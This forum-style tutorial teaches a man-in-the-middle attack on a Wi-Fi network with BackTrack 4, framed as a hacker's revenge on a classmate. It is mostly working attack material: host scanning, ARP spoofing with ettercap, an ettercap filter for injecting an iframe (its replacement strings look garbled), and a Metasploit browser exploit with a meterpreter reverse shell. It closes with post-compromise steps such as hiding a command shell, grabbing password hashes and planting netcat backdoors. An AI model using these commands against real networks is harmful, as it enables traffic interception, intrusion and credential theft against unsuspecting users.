[TUT] MITM ATTACKS (MAN IN THE MIDDLE ATTACK) USING BACKTRACK 4

LEMME TELL ABOUT WHATS MITM ATTACK ...

CONSIDER 3 friends Tom, Dick and Harry

Harry is a hacker and things had went wrong with harry and Tom ... Now.. Harry has decided to Ruin Tom's cyber world ...
One Day Tom is in his college surfing over a Wi-Fi network and is chatting to Dick ..

So now the technology of message conveying ...

Tom ---> Wi-Fi ----> Dick

Harry Jumps in the network and launches MITM attack on TOM .. So now all the info goes through harry

TOM---> Wi-Fi ---> Harry ----> Dick


Harry can see everything what tom is doing ... Using Ettercap and SSL Strip he can hack a secure network transmission used for Authentification to Social Networks ...

Thats Enough ... You have understood ....

Lets Go to mechanics ...

You need a Backtrack 4 ready on PC , Vmware or USB Drive ...
Some Wits (Have Patience)

first open Terminal and write down Default Gateway

-route (Command will tell you)

After that Scan for the targets

-nmap -sP default ip adress/24 ( This will give you a list of targets )

Ok listen ... Huge network more targets ... So numbers dont tell their name .. Target them all ...

Open a terminal session and type /usr/bin/start-network This command enables the networking on Backtrack

Now we need to update Metasploit. In a terminal type cd /pentest/exploit/framework3


This brings us to the Metasploit directory. Type in svn update. At the prompt type y.

This will update the Metasploit framework with the latest modules.

Now we need to enable IP forwarding using iptables

Enter echo 1 > /proc/sys/net/ipv4/ip_forward into a terminal window

Lastly we’ll ensure ip forwarding is enabled in ettercap

We need to edit the etter.conf file. However you choose to do that is up to you, I use VI. A VI tutorial is beyond the scope of this post. I suggest you check out the security researchers’ best friend: Google if you need help with VI. Type Kate from a terminal for a GUI text editor or choose it from the Utilities menu.

The file can usually be found here: /etc/etter.conf if you’re using Backtrack4 Final Release.

We need to make 3 changes in etter.conf:

ec-uid = 0

ec_guid = 0

uncomment the redir_command_on and redir_command_off sections below the “if you use iptables” section of etter.conf

NOW PREPARING ETTERCAP

Ettercap is a network sniffer that can not only log packet data but can use filters to inject or replace data within the packets. When used in a MITM attack ettercap filters can drop packets, or inject code into packets that will be forwarded to the target machine.

Enter this data into a text file using your favorite text editor and save it as iframe.txt:

if (ip.proto == TCP && tcp.dst == 80) {

if (search(DATA.data, “Accept-Encoding”)) {

replace(“Accept-Encoding”, “Accept-Rubbish!”);

# note: replacement string is same length as original string

msg(“zapped Accept-Encoding!\n”);

}

}

if (ip.proto == TCP && tcp.src == 80) {

replace(“”, “”);

msg(“iframe Filter Ran.\n”);

}

The above filter will put our iframe right before the closing body tag in most web sites.

Now from aterminal and in the same directory where you saved iframe.txt enter ettefilter iframe.txt –o iframe.ef.

This command compiles the iframe.txt file into the actual etterrcap filter, or “ef” file.

A success message would look like this: Script encoded into 15 instructions.


Section 3: Launch Metasploit

From the /pentest/exploit/framework3directory launch the Metasploit console with this command msfconsole

You can choose your favorite browser exploit, I’m going to use: windows/browser/ms10_xxx_helpctr_xss_cmd_exec

Metasploit commands:

Use windows/browser/ms10_xxx_helpctr_xss_cmd_exec

Set PAYLOAD windows/meterpreter/reverse_tcp

Set LHOST youripaddress

Set SRVHOST youripaddress

Set SRVPORT 80

Exploit

Section 4: Launch Ettercap for MITM attack


Now that all of the different prereqs for the attack have been prepared we can launch ettercap

Enter the following command into a terminal window (replace underlined items with the correct name in your environment): ettercap –i wlan –F iframe.ef –TQM arp:remote /targetip/ /gatewayip/ -P autoadd


The –i witch specifies interface, you only need it if you have multiple interfaces. If you have only one you can omit. –F is specifying the filter to use. T= text mode, Q=quiet M=MITM attack.

You may see only one of the addresses is added to an ettercap group. This is not uncommon with wireless clients. Both the gateway and target need to show up in one of the groups. You can either wait until your target sends an arp request or you can force it to by pinging a non existent IP on your subnet from the target. The choice is yours.

Once ettercap is running open up IE on your target and browse somewhere, I used test.com. You should see the “iframe filter run” message on your Backtrack box.

You should also see the exploit initiate on the Metasploit terminal. On your victim box a message will pop up. If oyu click allow the exploit will run.

You should then see a meterpreter session initiated on your Backtrack computer.

You can hit CTRL+C then type sessions –i 1 (that’s a number 1) to interact with the meterpreter session.

You’ve compromised the box! You can now do things like drop to a command shell on the target by entering shell into meterpreter. Or, if you want to be surreptitious you could enter execute –F cmd.exe –i –H –c. there are many things you can do with a successful meterpreter session setup. You can upload\download files, grab password hashes, send over a secure back door program like netcat, edit the registry… really whatever you want to do.

I hope you’ve found this post helpful, and will use it as a catalyst for more research to the kinds of things you can do with Backtrack and metasploit.

For more info